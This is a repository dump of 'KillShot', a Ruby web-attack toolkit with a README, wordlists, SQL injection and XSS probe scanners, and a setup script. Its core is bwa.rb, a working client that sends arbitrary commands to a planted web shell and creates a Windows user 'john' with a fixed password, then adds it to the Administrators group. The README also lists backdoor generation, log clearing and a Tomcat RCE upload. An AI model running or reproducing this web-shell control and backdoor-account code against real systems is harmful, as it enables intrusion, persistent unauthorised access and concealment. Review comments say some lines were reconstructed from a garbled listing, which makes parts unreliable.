Use targ to scan the IP of a server quickly with Shodan (option 2 scrapes the shodan.io host page for "Ports open:" rather than calling the API).

![scan](https://user-images.githubusercontent.com/19738278/48301305-31940880-e4ec-11e8-8a74-35d65b063930.JPG)


# Menu Site
{0} Spider
{1} Web technologie
{2} WebApp Vul Scanner
{3} Port Scanner
{4} CMS Scanner
{5} Fuzzers
{6} Cms Exploit Scanner
{7} Backdoor Generation
{8} Linux Log Clear (runs on the local machine -- see the note above)
{9} Find MX/NS

# WebApp Vul Scanner
{1} Xss scanner
{2} Sql Scanner
{3} Tomcat RCE (sends an HTTP PUT that writes test.jsp on the target -- this modifies the target, it is not a read-only check)

# Port Scanner
[0] Nmap Scan
[1] Unicorn Scan
Nmap Scan
[2] Nmap Os Scan
[3] Nmap TCP Scan
[4] Nmap UDP Scan (labelled "UDB" in the menu)
[5] Nmap All scan
[6] Nmap Http Option Scan
[7] Nmap Live target In Network
Unicorn Scan
[8] Services OS
[9] TCP SYN Scan on a whole network
[01] UDP scan on the whole network

# Backdoor Generation
{1} Generate Shell
{2} Connect Shell

# USAGE
1 ----- Help Command
[site] MAKE YOUR TARGET
[help] show this MESSAGE
[exit] exit the script
2 ------ Site command
Put your target as www.example.com
without the http:// prefix. All checks are made over plain HTTP on port 80 and redirects are not followed, so a site that only answers on HTTPS will mostly show up as "not found".



# Linux Setup

git clone https://github.com/bahaabdelwahed/killshot
cd killshot
ruby setup.rb (if setup shows any error just try to install the gems/tools manually)
ruby Killshot.rb (the file name is capitalised; `ruby killshot.rb` fails on a case-sensitive filesystem)
# Windows Setup
Download ruby for windows ==> https://rubyinstaller.org/downloads/
Download Cmder here ==> http://cmder.net/
Download Curl For 64/32 ==> https://curl.haxx.se/windows/
Download nmap ==> https://nmap.org/download.html
Enjoy !
# LAST_Update v 1.5
[+] Fix setup error
[+] Fix sql injection detect error
[+] Add Typo3 Scanner (+brute force)
[+] Detect Of the MX and NS
Easy and fast use of killshot

https://www.youtube.com/watch?v=SEGRh86J6vk

Use KillShot to detect and scan CMS vulnerabilities (Joomla && WordPress) and to scan for XSS and SQL injection

https://www.youtube.com/watch?v=QPF-rppYSOY


Please, anyone who finds any error/bugs in any code contact me; also if you want to add some code
or to upgrade some code in killshot just contact me


# references
Vulnerabilities are taken from

1) http://www.exploit-db.com
2) https://sploitus.com
3) http://cxsecurity.com


# FOR HELP : BTC 3FkNhWXxJTyGqGdkqZbvXqDj9ntPFoJpkW
--------------------------------------------------------------------------------
/api.txt:
--------------------------------------------------------------------------------
1 | 
2 | 
--------------------------------------------------------------------------------
/bwa.rb:
--------------------------------------------------------------------------------
1 | #/usr/bin/ruby -w
2 | require "open-uri"
3 | require "colorize"
4 | 
5 | $name 
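$name = ARGV[0]
$uri = ARGV[1]

# URL for one web-shell command.
#
# The command is percent-encoded: the listing sent "uname -a " literally,
# and a URL containing spaces is rejected by URI.parse
# (URI::InvalidURIError) before any request is made.  "+" for a space is
# decoded by a $_GET/$_REQUEST-style parser - TODO confirm that is how the
# generated shell reads "cmd".
def shell_url(uri, cmd)
  "http://#{uri}?cmd=#{URI.encode_www_form_component(cmd)}"
end

# Sends one command to the web shell at `uri` and returns the response body.
#
# Uses open-uri through the URI object rather than Kernel#open on a string:
# Kernel#open spawns a local process when its argument starts with "|",
# and both `uri` (argv) and `cmd` (stdin) are attacker-shaped input; on
# Ruby >= 3.0 Kernel#open no longer dispatches to open-uri at all, so the
# old calls would have tried to open a local file named "http://...".
def run_remote(uri, cmd)
  URI.parse(shell_url(uri, cmd)).read
end

# Interactive sub-menu offered when the first "ver" reply looks like Windows.
# The listing's inner loop had no exit at all; "back" now returns to the
# main prompt, and EOF on stdin leaves the loop instead of raising
# NoMethodError from gets.chomp.
def windows_menu(uri)
  loop do
    puts "------------------------------------ "
    print "@WINDOWS :: ".green
    line = gets
    break if line.nil?
    option = line.chomp
    puts "------------------------------------ "
    break if option == "back"

    case option
    when "0"
      # NOTE(review): a fixed, publicly known account (john / 14243454) is
      # created on the target; it is noisy, attributable, and usable by
      # anyone who has read this repository.  Kept because it is the
      # tool's documented behaviour, but consider prompting for a password.
      puts run_remote(uri, "net user john 14243454 /add ")
      puts "User Jhon Has benn created with 14243454 password ! ".green
    when "1"
      puts run_remote(uri, "net localgroup Administrators john /add ")
      puts "user John added to group ".green
    when "2"
      puts run_remote(uri, "net users ")
    end
  end
end

# No arguments: print usage.  The ASCII art's spacing was collapsed in the
# listing this was rebuilt from; the text is reproduced as shown.
# NOTE(review): the usage names the script "ra.rb" although the file is bwa.rb.
if $name.nil? && $uri.nil?
  puts "
 ** **
 ** **
 ** ** ****
 ** ** ** ****
 ** ** * ** **
 ** * * ** *** **
 ** * * ** ** *
 ** ** ** ** **
 ** ** **
 * *
 * *
 * 0 0 *
 * / @ \ *
 * \__/ \__/ *
 * W *
 ** **
 *****
 USAGE : ra.rb start /shell.php
 ra.rb shell.php



 ".red
end

# One argument: write the "shell" file.
# NOTE(review): the listing shows the payload as a single space, so the file
# written here is effectively empty - this script does not generate a shell
# body.
if !$name.nil? && $uri.nil?
  $shell = " "
  File.write($name, $shell)
  puts "The File #{$name} Has been created succesufuly ! ".green
end

# "start <host/shell.php>": identify the target, then run a command loop.
if $name == "start" && !$uri.nil?
  $inf = run_remote($uri, "ver")
  $inf2 = run_remote($uri, "uname -a ")
  puts "#{$inf}#{$inf2}".green
  windows = !$inf["Microsoft Windows"].nil?

  # gets reads from the files named in ARGV when ARGV is non-empty, so it
  # must be cleared once before the first prompt.
  ARGV.clear
  loop do
    print "<@root> ".red
    line = gets
    break if line.nil?          # EOF on stdin ends the session cleanly
    command = line.chomp
    break if command == "exit"  # previously only Ctrl-C left this loop

    if command == "whelp"
      puts " [0] Creat User "
      puts " [1] Add User to ADMIN_GROUP"
      puts " [2] Show users "
      puts " [back] Return to the shell prompt"
      windows_menu($uri) if windows
      # The listing fell through and also sent "whelp" to the target as a
      # command; the menu keyword is local, so skip that request.
      next
    end

    puts run_remote($uri, command)
  end
end
-------------------------------------------------------------------------------- /dns.txt: -------------------------------------------------------------------------------- 1 | www 2 | mail 3 | m 4 | api 5 | blog 6 | static 7 | ftp 8 | autodiscover 9 | openvpn 10 | dev 11 | mobile 12 | cdn 13 | webmail 14 | support 15 | test 16 | email 17 | ns1 18 | ns2 19 | news 20 | beta 21 | sip 22 | lyncdiscover 23 | secure 24 | video 25 | admin 26 | smtp 27 | media 28 | search 29 | images 30 | img 31 | help 32 | shop 33 | staging 34 | login 35 | www2 36 | my 37 | vpn 38 | localhost 39 | forum 40 | app 41 | jobs 42 | store 43 | ns3 44 | go 45 | apps 46 | hostmaster 47 | info 48 | wap 49 | services 50 | ads 51 | it 52 | live 53 | community 54 | google 55 | e 56 | es 57 | cms 58 | pop 59 | s 60 | msoid 61 | developer 62 | blogs 63 | chat 64 | download 65 | wiki 66 | calendar 67 | mail2 68 | www1 69 | i 70 | assets 71 | careers 72 | stage 73 | docs 74 | de 75 | qa 76 | imap 77 | data 78 | status 79 | content 80 | tv 81 | connect 82 | cs 83 | fr 84 | origin-www 85 | stats 86 | mx 87 | events 88 | ns 89 | www3 90 | forums 91 | new 92 | web 93 | image 94 | auth 95 | business 96 | survey 97 | id 98 | portal 99 | ns4 100 | link 101 | partners 102 | jira 103 | t 104 | service 105 | ad 106 | metrics 107 | newsletter 108 | meet 109 | cloud 110 | upload 111 | preview 112 | files 113 | social 114 | sso 115 | analytics 116 | origin 117 | maps 118 | feeds 119 | travel 120 | partner 121 | ru 122 | rss 123 | videos 124 | us 125 | research 126 | labs 127 | pay 128 | games 129 | music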
130 | mail1 131 | smetrics 132 | pt 133 | hr 134 | en 135 | nl 136 | cn 137 | demo 138 | c 139 | account 140 | a 141 | sites 142 | accounts 143 | dialin 144 | uk 145 | ssl 146 | owa 147 | home 148 | tools 149 | online 150 | jp 151 | corp 152 | sms 153 | developers 154 | ca 155 | v 156 | tr 157 | feedback 158 | lists 159 | ww 160 | edu 161 | crm 162 | bbs 163 | old 164 | finance 165 | dl 166 | ws 167 | stat 168 | pda 169 | library 170 | engineering 171 | archive 172 | access 173 | tech 174 | w 175 | photo 176 | share 177 | marketing 178 | map 179 | mx1 180 | health 181 | in 182 | groups 183 | global 184 | game 185 | design 186 | www4 187 | sport 188 | auto 189 | security 190 | intranet 191 | git 192 | mx2 193 | local 194 | pl 195 | education 196 | webdisk 197 | sandbox 198 | iphone 199 | br 200 | push 201 | sports 202 | press 203 | redirect 204 | ar 205 | mdm 206 | reviews 207 | promo 208 | legacy 209 | server 210 | english 211 | d 212 | cpanel 213 | training 214 | math 215 | book 216 | svn 217 | proxy 218 | vip 219 | sftp 220 | pop3 221 | mail3 222 | translate 223 | open 224 | directory 225 | cdn2 226 | cc 227 | av 228 | amp 229 | sts 230 | s1 231 | dashboard 232 | g 233 | prod 234 | payment 235 | ci 236 | ir 237 | sp 238 | passport 239 | img2 240 | about 241 | tracking 242 | exchange 243 | dns 244 | jenkins 245 | corporate 246 | books 247 | r 248 | p 249 | extranet 250 | office 251 | monitor 252 | event 253 | static2 254 | downloads 255 | www5 256 | sa 257 | ftp2 258 | li 259 | b 260 | ns5 261 | law 262 | im 263 | direct 264 | reports 265 | kr 266 | helpdesk 267 | alumni 268 | remote 269 | photos 270 | adfs 271 | stream 272 | shopping 273 | sg 274 | payments 275 | confluence 276 | b2b 277 | dns2 278 | cdn1 279 | brand 280 | widgets 281 | js 282 | dns1 283 | alpha 284 | net 285 | me 286 | s3 287 | preprod 288 | aws 289 | wwww 290 | start 291 | maintenance 292 | m2 293 | international 294 | radio 295 | img1 296 | click 297 | fs 298 | th 299 | css 300 | club 301 | tw 
302 | stg 303 | sc 304 | gateway 305 | whm 306 | _spf 307 | enterprise 308 | webconf 309 | ugc 310 | surveys 311 | learn 312 | se 313 | register 314 | cache 315 | au 316 | track 317 | s2 318 | physics 319 | get 320 | catalog 321 | uat 322 | st 323 | art 324 | links 325 | pro 326 | eu 327 | cas 328 | answers 329 | play 330 | tickets 331 | relay 332 | outlook 333 | lib 334 | history 335 | geo 336 | em 337 | code 338 | static1 339 | smtp2 340 | fi 341 | fb 342 | db 343 | web1 344 | vpn2 345 | update 346 | test2 347 | sales 348 | facebook 349 | ee 350 | ms 351 | members 352 | mailer 353 | log 354 | int 355 | wireless 356 | mobil 357 | mm 358 | lb 359 | chem 360 | at 361 | api2 362 | root 363 | people 364 | housing 365 | dev2 366 | learning 367 | hotels 368 | digital 369 | smtp1 370 | pages 371 | cp 372 | affiliates 373 | widget 374 | offers 375 | horizon 376 | cse 377 | webservices 378 | vote 379 | investor 380 | bi 381 | as 382 | member 383 | job 384 | desktop 385 | checkout 386 | autoconfig 387 | testing 388 | spf 389 | resources 390 | print 391 | newsletters 392 | innovation 393 | hub 394 | backup 395 | weather 396 | uc 397 | u 398 | ro 399 | profile 400 | marketplace 401 | ldap 402 | join 403 | ie 404 | affiliate 405 | user 406 | subscribe 407 | software 408 | lab 409 | feed 410 | advertising 411 | web2 412 | up 413 | cm 414 | sustainability 415 | pic 416 | mobilemail 417 | life 418 | faq 419 | privacy 420 | mi 421 | magazine 422 | img3 423 | deals 424 | career 425 | campaign 426 | ask 427 | alerts 428 | signup 429 | no 430 | mt 431 | l 432 | flights 433 | android 434 | storage 435 | player 436 | landing 437 | hk 438 | forms 439 | work 440 | ts 441 | toolbar 442 | mc 443 | drive 444 | atlas 445 | admissions 446 | market 447 | hu 448 | file 449 | ch 450 | cdn3 451 | plus 452 | gitlab 453 | apply 454 | transfer 455 | kb 456 | idp 457 | edge 458 | contact 459 | campus 460 | biz 461 | wifi 462 | sm 463 | reporting 464 | registrar 465 | postmaster 466 | zh 467 | be 468 
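| sharepoint 469 | securemail 470 | rs 471 | internal 472 | ext 473 | www6 474 | socialize 475 | parking 476 | inside 477 | cz 478 | campaigns 479 | tracker 480 | so 481 | sentry 482 | quiz 483 | noc 484 | m1 485 | list 486 | ece 487 | da 488 | test1 489 | sv 490 | projects 491 | money 492 | med 493 | epaper 494 | academy 495 | one 496 | nagios 497 | emergency 498 | ec 499 | dk 500 | co 501 | 502 | -------------------------------------------------------------------------------- /list.txt: -------------------------------------------------------------------------------- 1 | admin 2 | user 3 | password 4 | 5 | love123 6 | 123456789 7 | 112233445566 8 | -------------------------------------------------------------------------------- /setup.rb: --------------------------------------------------------------------------------
#!/usr/bin/ruby -w

# Installs the gems and system tools KillShot depends on.
#
# Every step is a shell command run through system().  A failed step is
# reported on stderr instead of aborting, because the README tells the user
# to install the remaining pieces by hand in that case; the listing ignored
# the return values entirely, so failures went unnoticed.
def run(cmd)
  puts "[*] #{cmd}"
  ok = system(cmd)
  warn "[!] failed: #{cmd}" unless ok
  ok
end

puts "Gems Instalation "
run("gem install colorize && gem install shodan && gem install rest-client")
run("sudo apt-get install build-essential patch ruby-dev zlib1g-dev liblzma-dev")
run("gem install nokogiri")
puts "Tools Instalation"
run("sudo apt-get install nmap && sudo apt-get install whatweb && sudo apt-get install host ")
# Supply-chain caveat: this clones an unpinned third-party repository and
# then runs its installer script; review the checkout before trusting it.
run("git clone https://github.com/Und3rf10w/kali-anonsurf")
# This was the only apt-get call without sudo; as a non-root user it failed.
run("sudo apt-get install tor")
# system("cd kali-anonsurf") only changed directory inside the child shell,
# so the installer was run from the current directory, not the checkout.
# Dir.chdir with a block changes this process's directory for the call.
if Dir.exist?("kali-anonsurf")
  Dir.chdir("kali-anonsurf") { run("./installer.sh") }
else
  warn "[!] kali-anonsurf checkout not found; run its installer manually"
end
-------------------------------------------------------------------------------- /sqlscan.rb: --------------------------------------------------------------------------------
#!/usr/bin/ruby -w
require "open-uri"
require "net/http"
require "colorize"
system("cls")
system("clear")
print "
 _______ __ _______
 | __|.-----.| | __|.----.---.-.-----.
 |__ || _ || |__ || __| _ | |
 |_______||__ ||__|_______||____|___._|__|__|
 |__|

".red

USER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre'
SQL_PAYLOADS = ["'", "/*", "/>X"].freeze
# Substrings whose presence in a response body is taken as a DB error page.
SQL_ERROR_MARKERS = ["You have an erro", "SQL", "MYSQL"].freeze

# Probe URL for one target/payload pair.
#
# Targets come from a file, so the trailing newline is stripped (the
# listing appended the payload after "\n", which URI.parse rejects).  Only
# characters URI.parse refuses are percent-encoded - ">" in "/>X" - while
# "'" "/" "*" stay literal so the server sees the same bytes as before.
def sql_probe_url(target, payload)
  "#{target.strip}#{URI::RFC2396_Parser.new.escape(payload)}"
end

# True when `body` contains one of SQL_ERROR_MARKERS (byte-wise, so a
# non-UTF-8 body does not raise Encoding::CompatibilityError).
def sql_error?(body)
  bytes = body.b
  SQL_ERROR_MARKERS.any? { |marker| bytes.include?(marker.b) }
end

# One GET with the browser User-Agent.  Redirects are not followed, so a
# 3xx is reported as such.  Returns the Net::HTTPResponse.
def get_with_ua(url)
  uri = URI.parse(url)
  Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == "https") do |http|
    http.request(Net::HTTP::Get.new(uri, "User-Agent" => USER_AGENT))
  end
end

list = ARGV[0]
if ARGV.length < 1
  puts "USAGE <./sqlscan.rb sites.txt >"
  exit
end

File.foreach(list) do |target|
  target = target.strip
  next if target.empty?

  test_no = 1
  SQL_PAYLOADS.each do |payload|
    url = sql_probe_url(target, payload)
    begin
      response = get_with_ua(url)
    rescue StandardError => err
      # The listing had no rescue: one unreachable host aborted the scan.
      puts "#{target} request failed: #{err.class}: #{err.message}".yellow
      break
    end

    code = response.code.to_i
    if code > 400
      # NOTE(review): every status above 400 - a plain 404 included - is
      # reported as SQL here; only 5xx is real evidence of a DB error.
      print "#{target} "
      print " =========== > SQL DETECTED\n\n".red
    elsif code > 300
      # NOTE(review): lines 36-38 of the original are garbled in the
      # listing; reconstructed as a redirect notice - confirm against the
      # original file.
      puts "#{target} =========== > Redirect"
    end

    # The listing fetched the body with a second open-uri request here.
    # That call raises OpenURI::HTTPError on every 4xx/5xx - i.e. exactly
    # in the "detected" case above - and killed the whole scan.  Reuse the
    # body of the request already made.
    if sql_error?(response.body.to_s)
      print "#{target} "
      print " =========== > [*] SQL DETECTED\n\n".red
      break
    end

    puts target
    puts "Test N : #{test_no}"
    puts "=============== >[*] Not vulnrable\n\n".green
    test_no += 1
  end
end
-------------------------------------------------------------------------------- /x3scan.rb: --------------------------------------------------------------------------------
#!/usr/bin/ruby -w

# Xss Detection tool Powred by baha
require "open-uri"
require "net/http"
require "colorize"
system("cls")
print "

 _ _ ___
 `. / / \ ____ ___ ___ , __
 \,' _-' ( .' ` / ` |' `.
 ,'\ \ `--. | | | | |
 / \ \___) \___.' `._.' `.__/| / |


\n".red

list = ARGV[0]

if ARGV.length < 1
  puts "USAGE <./x3scan.rb sites.txt >"
  exit
end

# Payloads encoded with http encode
XSS_PAYLOADS = [
  "%22%3EXXTES%3C",
  "%2F%22%3EXXTES%3C",
  "%2522%253EXXTES%253C",
  "%3Ca%20href%3D%22google.com%22%3EXXTES%3C%2Fa%3E"
].freeze
# What a reflected, unescaped payload looks like in the response.
XSS_MARKER = ">XXTES<"

# Probe URL for one target/payload pair; the target's trailing newline from
# the input file is stripped (the listing appended the payload after "\n",
# which URI.parse rejects).
def xss_probe_url(target, payload)
  "#{target.strip}#{payload}"
end

# True when the marker is reflected verbatim (byte-wise compare).
def xss_reflected?(body)
  body.b.include?(XSS_MARKER.b)
end

File.foreach(list) do |target|
  target = target.strip
  next if target.empty?

  XSS_PAYLOADS.each do |payload|
    url = xss_probe_url(target, payload)
    begin
      response = Net::HTTP.get_response(URI.parse(url))
    rescue StandardError => err
      puts " #{target} request failed: #{err.class}: #{err.message}".yellow
      break
    end

    # The listing issued two requests per payload and read the body with
    # open-uri *before* checking the status, so any 4xx/5xx raised
    # OpenURI::HTTPError and the "Maybe Vulnrable" branch never ran.  One
    # request now supplies both the status and the body.
    if response.code != "200"
      puts " #{target} Maybe Vulnrable \n\n".yellow
      break
    end

    if xss_reflected?(response.body.to_s)
      puts "#{target} XSS DETECTED"
      break
    end
    puts " #{target} Not vulnrable to xss"
  end
end
--------------------------------------------------------------------------------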